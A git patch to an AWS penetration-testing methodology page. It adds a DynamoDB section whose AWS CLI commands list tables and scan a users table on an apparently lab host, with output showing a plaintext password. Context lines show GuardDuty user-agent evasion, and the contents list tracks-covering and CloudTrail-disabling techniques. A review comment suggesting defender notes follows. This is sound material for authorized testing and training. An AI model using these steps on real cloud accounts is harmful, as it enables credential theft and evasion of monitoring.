From a4bdabea83e7efee39fd75dbeba19944fae0a79f Mon Sep 17 00:00:00 2001
From: soka
Date: Fri, 30 Apr 2021 21:44:21 +0200
Subject: [PATCH] Add AWS DynamoDB enumeration
---
 .../Cloud - AWS Pentest.md | 76 +++++++++++++------
 1 file changed, 53 insertions(+), 23 deletions(-)
diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md
index e20e269..d29242c 100644
--- a/Methodology and Resources/Cloud - AWS Pentest.md
+++ b/Methodology and Resources/Cloud - AWS Pentest.md
@@ -4,29 +4,31 @@
 ## Summary
-* [Training](#training)
-* [Tools](#tools)
-* [AWS - Patterns](#aws---patterns)
-* [AWS - Metadata SSRF](#aws---metadata-ssrf)
- * [Method for Elastic Cloud Compute (EC2)](#method-for-elastic-cloud-compute-ec2)
- * [Method for Container Service (Fargate)](#method-for-container-service-fargate)
- * [AWS API calls that return credentials](#aws-api-calls-that-return-credentials)
-* [AWS - Shadow Admin](#aws---shadow-admin)
- * [Admin equivalent permission](#admin-equivalent-permission)
-* [AWS - Gaining AWS Console Access via API Keys](#aws---gaining-aws-console-access-via-api-keys)
-* [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux)
-* [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image)
-* [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance)
-* [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code)
-* [AWS - SSM - Command execution](#aws---ssm---command-execution)
-* [AWS - Golden SAML Attack](#aws---golden-saml-attack)
-* [AWS - Shadow Copy Attack](#aws---shadow-copy-attack)
-* [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty)
- * [PenTest:IAMUser/KaliLinux](#)
- * [PenTest:IAMUser/ParrotLinux](#)
- * [PenTest:IAMUser/PentooLinux](#)
-* [Security checks](#security-checks)
-* [References](#references)
+- [AWS](#aws)
+ - [Summary](#summary)
+ - [Training](#training)
+ - [Tools](#tools)
+ - [AWS Patterns](#aws-patterns)
+ - [AWS - Metadata SSRF](#aws---metadata-ssrf)
+ - [Method for Elastic Cloud Compute (EC2)](#method-for-elastic-cloud-compute-ec2)
+ - [Method for Container Service (Fargate)](#method-for-container-service-fargate)
+ - [AWS API calls that return credentials](#aws-api-calls-that-return-credentials)
+ - [AWS - Shadow Admin](#aws---shadow-admin)
+ - [Admin equivalent permission](#admin-equivalent-permission)
+ - [AWS - Gaining AWS Console Access via API Keys](#aws---gaining-aws-console-access-via-api-keys)
+ - [AWS - Enumerate IAM permissions](#aws---enumerate-iam-permissions)
+ - [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux)
+ - [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image)
+ - [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance)
+ - [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code)
+ - [AWS - SSM - Command execution](#aws---ssm---command-execution)
+ - [AWS - Golden SAML Attack](#aws---golden-saml-attack)
+ - [AWS - Shadow Copy attack](#aws---shadow-copy-attack)
+ - [Disable CloudTrail](#disable-cloudtrail)
+ - [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty)
+ - [DynamoDB](#dynamodb)
+ - [Security checks](#security-checks)
+ - [References](#references)
 ## Training
@@ -605,6 +607,34 @@ if 'kali' in ua.lower() or 'parrot' in ua.lower() or 'pentoo' in ua.lower(): # self.print('Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...') ``` +## DynamoDB +> Amazon DynamoDB is a key-value and document database that delivers single-digit millisecond performance at any scale. It's a fully managed, multi-region, multi-active, durable database with built-in security, backup and restore, and in-memory caching for internet-scale applications. DynamoDB can handle more than 10 trillion requests per day and can support peaks of more than 20 million requests per second. + +* list tables +```bash +$ aws --endpoint-url http://s3.bucket.htb dynamodb list-tables + +{ + "TableNames": [ + "users" + ] +} +``` + +* enumerate table content +```bash +$ aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]' + +{ + "password": { + "S": "Management@#1@#" + }, + "username": { + "S": "Mgmt" + } +} +``` + ## Security checks https://github.com/DenizParlak/Zeus
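Review bot: The new DynamoDB section never says what the two commands require or where they were run: both pass `--endpoint-url http://s3.bucket.htb`, which appears to be a lab host rather than an AWS regional endpoint. I would add one line under the heading, for example `Requires dynamodb:ListTables and dynamodb:Scan; the endpoint shown is a lab host, not an AWS regional endpoint.`, so a reader can map each step to an IAM policy review. The sample output shows a password held as a plain string attribute, and the text should name that as the finding, e.g. `Secrets stored unhashed in table items are readable by any principal allowed to Scan the table.` For the defender's side, a sentence noting that item-level reads are CloudTrail data events, which as far as I know are only recorded when data-event logging is enabled for the table, would explain why this activity is easy to miss. As a style point, the `$` prompt, the command and its JSON output share one `bash` fence; moving the output into a separate `json` fence would make both blocks easier to read.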